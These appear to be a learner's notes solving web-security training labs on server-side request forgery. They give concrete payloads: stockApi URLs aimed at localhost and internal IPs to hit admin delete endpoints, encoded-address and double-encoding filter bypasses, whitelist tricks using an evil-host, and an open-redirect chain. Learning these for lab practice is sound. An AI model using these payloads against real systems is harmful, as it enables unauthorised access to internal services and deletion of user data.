                 

                              SERVER SITE REQUEST FORGERY
                              ===========================


LAB1 : Basic SSRF against the local server
------------------------------------------
1. when i check the stok for the item, got this
   stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
2. So i check if the localhost can be access from this with 
   stockApi = http://localhost
3. it's correct, so i check the location of [admin panel] and  [delete user] locations from the html 
4. Then use it (BOOM!)


LAB2 : Basic SSRF against another back-end system
-------------------------------------------------
1. check the stok
2. got the stokApi request to the server (stockApi=http://192.168.0.1:8080/product/stock/check?productId=5&storeId=1)
3. so i brute force the real ip for admin panel (http://192.168.0.$1$:8080/admin)
4. then got the ip and delete the carlos(BOOM!)



             CIRCUMVENTING COMMON SSRF DEFENSE
             =================================


SSRF with blacklist-based input filter
--------------------------------------
 - use such as 2130706433, 017700000001, or 127.1 instead o 127.0.0.1
 - Obfuscate blocked strings using URL encoding or case variation



Lab3: SSRF with blacklist-based input filter
-------------------------------------------
1. in the stokAPi=http://127.1/admin/delete?username=carlos
2. change a of admin and d of delete to URL encode twice
3. BOOM!


SSRF with whitelist-based input filter
--------------------------------------
- allow only URLs they preidentified
Bypass technique
----------------
1.You can embed credentials in a URL before the hostname, using the @ character. For example:
https://expected-host:fakepassword@evil-host

2.You can use the # character to indicate a URL fragment. For example:
https://evil-host#expected-host

3.You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example:
https://expected-host.evil-host



Bypassing SSRF filters via open redirection
-------------------------------------------
- redirection from the bypassed SSRF 
eg=> /product/nextProduct?currentProductId=6&path=http://evil-user.net -> return to -> http://evil-user.net




Lab4: SSRF with filter bypass via open redirection vulnerability
----------------------------------------------------------------
1. check the stock and no found SSRF vuln
2. so go to the next product (GET /product/nextProduct?currentProductId=4&path=/product?productId=5)
3. so change it into [urlencode(stokAPI=/product/nextProduct?currentProductId=4&path=http://192.168.0.12:8080/admin/delete?username=carlos]
4.BOOM!





                              BLIND SSRF VULNERABILITY
                              ========================

- The most reliable way to detect blind SSRF vulnerabilities is using out-of-band (OAST) techniques.

- The easiest and most effective way to use out-of-band techniques is using Burp Collaborator.


Lab5: Blind SSRF with out-of-band detection
------------------------------------------
1. click one of the product and you will see the referrence in the request header
2. so replace the reference with the burpcollaborator
3. then pull , so the requests will received
4. BOOM!



